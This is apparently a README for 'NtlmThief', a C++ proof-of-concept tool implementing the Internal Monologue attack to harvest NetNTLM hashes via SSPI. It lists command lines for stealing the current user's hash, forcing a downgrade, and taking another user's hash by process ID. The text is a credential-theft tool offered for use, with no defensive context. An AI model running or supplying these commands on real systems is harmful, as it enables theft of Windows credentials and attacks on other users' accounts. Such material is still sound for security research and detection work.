This is a C++ implementation of the Internal Monologue attack. It allows to get NetNTLM hashes of users using SSPI.
It's Internal Monologue POC on C++.
# Current User NetNTLM
.\NtlmThief.exe
# With Downgrade
.\NtlmThief.exe -downgrade
# Other user NetNTLM (PID - Process Id of other user)
.\NtlmThief.exe -pid 123